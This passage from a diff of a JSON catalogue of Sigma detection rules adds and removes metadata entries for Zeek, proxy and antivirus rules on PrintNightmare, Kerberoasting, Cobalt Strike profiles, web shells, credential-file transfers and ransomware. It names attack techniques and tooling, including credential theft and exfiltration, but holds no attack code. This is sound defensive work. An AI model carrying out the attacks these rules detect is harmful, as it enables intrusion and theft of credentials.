"https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", + "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://github.com/corelight/CVE-2021-1675", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml" + ], + "tags": [ + "attack.execution", + "cve.2021.1678", + "cve.2021.1675", + "cve.2021.34527" + ] + }, + "uuid": "7b33baef-2a75-4ca3-9da4-34f9a15382d8", + "value": "Possible PrintNightmare Print Driver Install" + }, { "description": "Detects known sensitive file extensions via Zeek", "meta": { @@ -10841,7 +1242,6 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_raccess_sensitive_fext.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml" ], "tags": [ @@ -10851,6 +1251,30 @@ "uuid": "286b47ed-f6fe-40b3-b3a8-35129acd43bc", "value": "Suspicious Access to Sensitive File Extensions - Zeek" }, + { + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "meta": { + "author": "Samir Bousseaden, @neu5ron, Tim Shelton", + "creation_date": "2020/04/02", + "falsepositive": [ + "Update the excluded named pipe to filter out any newly observed legit named pipe" + ], + "filename": "zeek_smb_converted_win_lm_namedpipe.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://twitter.com/menasec1/status/1104489274387451904", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "021310d9-30a6-480a-84b7-eaa69aeb92bb", + "value": "First Time Seen Remote Named Pipe - Zeek" + }, { "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", "meta": { @@ -10864,7 +1288,7 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://github.com/neo23x0/sigma/blob/373424f14574facf9e261d5c822345a282b91479/rules/windows/builtin/win_transferring_files_with_credential_data_via_network_shares.yml", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml" ], "tags": [ @@ -10878,2449 +1302,2080 @@ "value": "Transferring Files with Credential Data via Network Shares - Zeek" }, { - "description": "Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting", + "description": "The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused).\nAlthough recently it has been used in DNSSec, the value being set to anything other than 0 should be rare.\nOtherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward.\nDetermine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering.\nThis Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'\n", "meta": { - "author": "sigma", - "creation_date": "2020/02/12", + "author": "@neu5ron, SOC Prime Team, Corelight", + "creation_date": "2021/05/04", "falsepositive": [ - "Normal enterprise SPN requests activity" + "Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.", + "If you work in a Public Sector then it may be good to exclude things like endswith \".edu\", \".gov\" and or \".mil\"" ], - "filename": "zeek_susp_kerberos_rc4.yml", + "filename": "zeek_dns_susp_zbit_flag.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://adsecurity.org/?p=3458", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_susp_kerberos_rc4.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ] - }, - "uuid": "503fe26e-b5f2-4944-a126-eab405cc06e5", - "value": "Kerberos Network Traffic RC4 Ticket Encryption" - }, - { - "description": "Detect update check performed by Advanced IP Scanner and Advanced Port Scanner", - "meta": { - "author": "Axel Olsson", - "creation_date": "2022/08/14", - "falsepositive": [ - "Legitimate use by administrators" - ], - "filename": "proxy_adv_ip_port_scanner_upd_check.yml", - "level": "medium", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://www.advanced-ip-scanner.com/", - "https://www.advanced-port-scanner.com/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_adv_ip_port_scanner_upd_check.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1590" - ] - }, - "uuid": "1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d", - "value": "Advanced IP/Port Scanner Update Check" - }, - { - "description": "Detects suspicious user agent string of APT40 Dropbox tool", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2019/11/12", - "falsepositive": [ - "Old browsers" - ], - "filename": "proxy_apt40.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "Internal research from Florian Roth", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_apt40.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001", - "attack.exfiltration", - "attack.t1567.002" - ] - }, - "uuid": "5ba715b6-71b7-44fd-8245-f66893e81b3d", - "value": "APT40 Dropbox Tool User Agent" - }, - { - "description": "Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/02/08", - "falsepositive": [ - "Unlikely" - ], - "filename": "proxy_apt_domestic_kitten.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_apt_domestic_kitten.yml" + "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", + "https://tools.ietf.org/html/rfc2929#section-2.1", + "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", + "https://twitter.com/neu5ron/status/1346245602502443009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml" ], "tags": [ + "attack.t1095", + "attack.t1571", "attack.command_and_control" ] }, - "uuid": "6c939dfa-c710-4e12-a4dd-47e1f10e68e1", - "value": "Domestic Kitten FurBall Malware Pattern" + "uuid": "ede05abc-2c9e-4624-9944-9ff17fdc0bf5", + "value": "Suspicious DNS Z Flag Bit Set" }, { - "description": "Detects Baby Shark C2 Framework communication patterns", + "description": "Detects suspicious Django web application framework exceptions that could indicate exploitation attempts", "meta": { - "author": "Florian Roth", - "creation_date": "2021/06/09", + "author": "Thomas Patzke", + "creation_date": "2017/08/05", "falsepositive": [ - "Unknown" + "Application bugs" ], - "filename": "proxy_baby_shark.yml", - "level": "critical", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_baby_shark.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "304810ed-8853-437f-9e36-c4975c3dfd7e", - "value": "BabyShark Agent Pattern" - }, - { - "description": "Detects HTTP requests used by Chafer malware", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/01/31", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_chafer_malware.yml", - "level": "critical", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://securelist.com/chafer-used-remexi-malware/89538/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_chafer_malware.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "fb502828-2db0-438e-93e6-801c7548686d", - "value": "Chafer Malware URL Pattern" - }, - { - "description": "Detects Malleable Amazon Profile", - "meta": { - "author": "Markus Neis", - "creation_date": "2019/11/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_cobalt_amazon.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile", - "https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_amazon.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "953b895e-5cc9-454b-b183-7f3db555452e", - "value": "CobaltStrike Malleable Amazon Browsing Traffic Profile" - }, - { - "description": "Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/05/06", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_cobalt_malformed_uas.yml", - "level": "critical", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_malformed_uas.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "41b42a36-f62c-4c34-bd40-8cb804a34ad8", - "value": "CobaltStrike Malformed UAs in Malleable Profiles" - }, - { - "description": "Detects Malleable (OCSP) Profile with Typo (OSCP) in URL", - "meta": { - "author": "Markus Neis", - "creation_date": "2019/11/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_cobalt_ocsp.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_ocsp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "37325383-740a-403d-b1a2-b2b4ab7992e7", - "value": "CobaltStrike Malleable (OCSP) Profile" - }, - { - "description": "Detects Malleable OneDrive Profile", - "meta": { - "author": "Markus Neis", - "creation_date": "2019/11/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_cobalt_onedrive.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_onedrive.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "c9b33401-cc6a-4cf6-83bb-57ddcb2407fc", - "value": "CobaltStrike Malleable OneDrive Browsing Traffic Profile" - }, - { - "description": "Detects WebDav DownloadCradle", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/04/06", - "falsepositive": [ - "Administrative scripts that download files from the Internet", - "Administrative scripts that retrieve certain website contents", - "Legitimate WebDAV administration" - ], - "filename": "proxy_downloadcradle_webdav.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_downloadcradle_webdav.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "e09aed7a-09e0-4c9a-90dd-f0d52507347e", - "value": "Windows WebDAV User Agent" - }, - { - "description": "Detects download of certain file types from hosts with dynamic DNS names (selected list)", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/11/08", - "falsepositive": [ - "Software downloads" - ], - "filename": "proxy_download_susp_dyndns.yml", + "filename": "appframework_django_exceptions.yml", "level": "medium", - "logsource.category": "proxy", - "logsource.product": "No established product", + "logsource.category": "application", + "logsource.product": "django", "refs": [ - "https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_dyndns.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1105", - "attack.t1568" - ] - }, - "uuid": "195c1119-ef07-4909-bb12-e66f5e07bf3c", - "value": "Download from Suspicious Dyndns Hosts" - }, - { - "description": "Detects download of certain file types from hosts in suspicious TLDs", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/11/07", - "falsepositive": [ - "All kinds of software downloads" - ], - "filename": "proxy_download_susp_tlds_blacklist.yml", - "level": "low", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", - "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", - "https://www.spamhaus.org/statistics/tlds/", - "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_blacklist.yml" + "https://docs.djangoproject.com/en/1.11/ref/exceptions/", + "https://docs.djangoproject.com/en/1.11/topics/logging/#django-security", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/django/appframework_django_exceptions.yml" ], "tags": [ "attack.initial_access", - "attack.t1566", - "attack.execution", - "attack.t1203", - "attack.t1204.002" + "attack.t1190" ] }, - "uuid": "00d0b5ab-1f55-4120-8e83-487c0a7baf19", - "value": "Download from Suspicious TLD" + "uuid": "fd435618-981e-4a7c-81f8-f78ce480d616", + "value": "Django Framework Exceptions" }, { - "description": "Detects executable downloads from suspicious remote systems", + "description": "Detects a highly relevant Antivirus alert that reports a password dumper", "meta": { "author": "Florian Roth", - "creation_date": "2017/03/13", + "creation_date": "2018/09/09", "falsepositive": [ - "All kind of software downloads" + "Unlikely" ], - "filename": "proxy_download_susp_tlds_whitelist.yml", - "level": "low", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_whitelist.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566", - "attack.execution", - "attack.t1203", - "attack.t1204.002" - ] - }, - "uuid": "b5de2919-b74a-4805-91a7-5049accbaefe", - "value": "Download EXE from Suspicious TLD" - }, - { - "description": "Detects user agent and URI paths used by empire agents", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/13", - "falsepositive": [ - "Valid requests with this exact user agent to server scripts of the defined names" - ], - "filename": "proxy_empire_ua_uri_combos.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/BC-SECURITY/Empire", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_empire_ua_uri_combos.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "b923f7d6-ac89-4a50-a71a-89fb846b4aa8", - "value": "Empire UserAgent URI Combo" - }, - { - "description": "Detects suspicious empty user agent strings in proxy logs", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/07/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_empty_ua.yml", - "level": "medium", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://twitter.com/Carlos_Perez/status/883455096645931008", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_empty_ua.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "21e44d78-95e7-421b-a464-ffd8395659c4", - "value": "Empty User Agent" - }, - { - "description": "Detects URL pattern used by iOS Implant", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_ios_implant.yml", + "filename": "av_password_dumper.yml", "level": "critical", - "logsource.category": "proxy", + "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", - "https://twitter.com/craiu/status/1167358457344925696", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ios_implant.yml" + "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", + "https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_password_dumper.yml" ], "tags": [ - "attack.execution", - "attack.t1203", - "attack.collection", - "attack.t1005", - "attack.t1119", "attack.credential_access", - "attack.t1528", - "attack.t1552.001" + "attack.t1003", + "attack.t1558", + "attack.t1003.001", + "attack.t1003.002" ] }, - "uuid": "e06ac91d-b9e6-443d-8e5b-af749e7aa6b6", - "value": "iOS Implant URL Pattern" + "uuid": "78cc2dd2-7d20-4d32-93ff-057084c38b93", + "value": "Antivirus Password Dumper Detection" }, { - "description": "Detects Java class download in proxy logs, e.g. used in Log4shell exploitation attacks against Log4j.", + "description": "Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .", "meta": { - "author": "Andreas Hunkeler (@Karneades)", - "creation_date": "2021/12/21", + "author": "Sittikorn S, Nuttakorn T, Tim Shelton", + "creation_date": "2021/07/01", "falsepositive": [ - "Unknown" + "Unlikely, or pending PSP analysis" ], - "filename": "proxy_java_class_download.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://www.lunasec.io/docs/blog/log4j-zero-day/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_java_class_download.yml" - ], - "tags": [ - "attack.initial_access" - ] - }, - "uuid": "53c15703-b04c-42bb-9055-1937ddfb3392", - "value": "Java Class Proxy Download" - }, - { - "description": "Detects Windows PowerShell Web Access", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/13", - "falsepositive": [ - "Administrative scripts that download files from the Internet", - "Administrative scripts that retrieve certain website contents" - ], - "filename": "proxy_powershell_ua.yml", - "level": "medium", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_powershell_ua.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "c8557060-9221-4448-8794-96320e6f3e74", - "value": "Windows PowerShell User Agent" - }, - { - "description": "Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/04/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_pwndrop.yml", + "filename": "av_printernightmare_cve_2021_34527.yml", "level": "critical", - "logsource.category": "proxy", + "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://breakdev.org/pwndrop/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_pwndrop.yml" + "https://twitter.com/mvelazco/status/1410291741241102338", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_printernightmare_cve_2021_34527.yml" ], "tags": [ - "attack.command_and_control", - "attack.t1071.001", - "attack.t1102.001", - "attack.t1102.003" + "attack.privilege_escalation", + "attack.t1055" ] }, - "uuid": "2b1ee7e4-89b6-4739-b7bb-b811b6607e5e", - "value": "PwnDrp Access" + "uuid": "6fe1719e-ecdf-4caf-bffe-4f501cb0a561", + "value": "Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection" }, { - "description": "Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form", + "description": "Detects an Antivirus alert in a highly relevant file path or with a relevant file name", "meta": { - "author": "Florian Roth", - "creation_date": "2019/12/05", + "author": "Florian Roth, Arnim Rupp", + "creation_date": "2018/09/09", "falsepositive": [ - "User activity (e.g. developer that shared and copied code snippets and used the raw link instead of just copy & paste)" + "Unlikely" ], - "filename": "proxy_raw_paste_service_access.yml", + "filename": "av_relevant_files.yml", "level": "high", - "logsource.category": "proxy", + "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://www.virustotal.com/gui/domain/paste.ee/relations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_raw_paste_service_access.yml" + "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_relevant_files.yml" ], "tags": [ - "attack.command_and_control", - "attack.t1071.001", - "attack.t1102.001", - "attack.t1102.003", - "attack.defense_evasion" + "attack.resource_development", + "attack.t1588" ] }, - "uuid": "5468045b-4fcc-4d1a-973c-c9c9578edacb", - "value": "Raw Paste Service Access" + "uuid": "c9a88268-0047-4824-ba6e-4d81ce0b907c", + "value": "Antivirus Relevant File Paths Alerts" }, { - "description": "Detects a flashplayer update from an unofficial location", + "description": "Detects a highly relevant Antivirus alert that reports an exploitation framework", "meta": { "author": "Florian Roth", - "creation_date": "2017/10/25", + "creation_date": "2018/09/09", "falsepositive": [ - "Unknown flash download locations" + "Unlikely" ], - "filename": "proxy_susp_flash_download_loc.yml", - "level": "high", - "logsource.category": "proxy", + "filename": "av_exploiting.yml", + "level": "critical", + "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_susp_flash_download_loc.yml" + "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_exploiting.yml" ], "tags": [ - "attack.initial_access", - "attack.t1189", "attack.execution", - "attack.t1204.002", - "attack.defense_evasion", - "attack.t1036.005" + "attack.t1203", + "attack.command_and_control", + "attack.t1219" ] }, - "uuid": "4922a5dd-6743-4fc2-8e81-144374280997", - "value": "Flash Player Update from Suspicious Location" + "uuid": "238527ad-3c2c-4e4f-a1f6-92fd63adb864", + "value": "Antivirus Exploitation Framework Detection" }, { - "description": "Detects suspicious requests to Telegram API without the usual Telegram User-Agent", + "description": "Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool", "meta": { "author": "Florian Roth", - "creation_date": "2018/06/05", + "creation_date": "2021/08/16", "falsepositive": [ - "Legitimate use of Telegram bots in the company" + "Unlikely" ], - "filename": "proxy_telegram_api.yml", - "level": "medium", - "logsource.category": "proxy", + "filename": "av_hacktool.yml", + "level": "high", + "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", - "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", - "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_telegram_api.yml" + "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_hacktool.yml" ], "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001", - "attack.t1102.002" + "attack.execution", + "attack.t1204" ] }, - "uuid": "b494b165-6634-483d-8c47-2026a6c52372", - "value": "Telegram API Access" + "uuid": "fa0c05b6-8ad3-468d-8231-c1cbccb64fba", + "value": "Antivirus Hacktool Detection" }, { - "description": "Detects Turla ComRAT patterns", + "description": "Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. github and checking the matches.", "meta": { - "author": "Florian Roth", - "creation_date": "2020/05/26", + "author": "Florian Roth, Arnim Rupp", + "creation_date": "2018/09/09", "falsepositive": [ - "Unknown" + "Unlikely" ], - "filename": "proxy_turla_comrat.yml", + "filename": "av_webshell.yml", "level": "high", - "logsource.category": "proxy", + "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_turla_comrat.yml" + "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", + "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection", + "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", + "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", + "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", + "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", + "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", + "https://github.com/tennc/webshell", + "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_webshell.yml" ], "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001", - "attack.g0010" - ] - }, - "uuid": "7857f021-007f-4928-8b2c-7aedbe64bb82", - "value": "Turla ComRAT" - }, - { - "description": "Detects suspicious user agent strings used in APT malware in proxy logs", - "meta": { - "author": "Florian Roth, Markus Neis", - "creation_date": "2019/11/12", - "falsepositive": [ - "Old browsers" - ], - "filename": "proxy_ua_apt.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_apt.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "6ec820f2-e963-4801-9127-d8b2dce4d31b", - "value": "APT User Agent" - }, - { - "description": "Detects Bitsadmin connections to IP addresses instead of FQDN names", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/10", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_ua_bitsadmin_susp_ip.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_ip.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001", - "attack.defense_evasion", "attack.persistence", - "attack.t1197", - "attack.s0190" + "attack.t1505.003" ] }, - "uuid": "8ccd35a2-1c7c-468b-b568-ac6cdf80eec3", - "value": "Bitsadmin to Uncommon IP Server Address" + "uuid": "fdf135a2-9241-4f96-a114-bb404948f736", + "value": "Antivirus Web Shell Detection" }, { - "description": "Detects Bitsadmin connections to domains with uncommon TLDs", - "meta": { - "author": "Florian Roth, Tim Shelton", - "creation_date": "2019/03/07", - "falsepositive": [ - "Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca" - ], - "filename": "proxy_ua_bitsadmin_susp_tld.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://twitter.com/jhencinski/status/1102695118455349248", - "https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001", - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190" - ] - }, - "uuid": "9eb68894-7476-4cd6-8752-23b51f5883a7", - "value": "Bitsadmin to Uncommon TLD" - }, - { - "description": "Detects suspicious user agent strings used by crypto miners in proxy logs", + "description": "Detects a highly relevant Antivirus alert that reports ransomware", "meta": { "author": "Florian Roth", - "creation_date": "2019/10/21", + "creation_date": "2022/05/12", "falsepositive": [ - "Unknown" + "Unlikely" ], - "filename": "proxy_ua_cryptominer.yml", - "level": "high", - "logsource.category": "proxy", + "filename": "av_ransomware.yml", + "level": "critical", + "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65", - "https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_cryptominer.yml" + "https://www.nextron-systems.com/?s=antivirus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_ransomware.yml" ], "tags": [ - "attack.command_and_control", - "attack.t1071.001" + "attack.t1486" ] }, - "uuid": "fa935401-513b-467b-81f4-f9e77aa0dd78", - 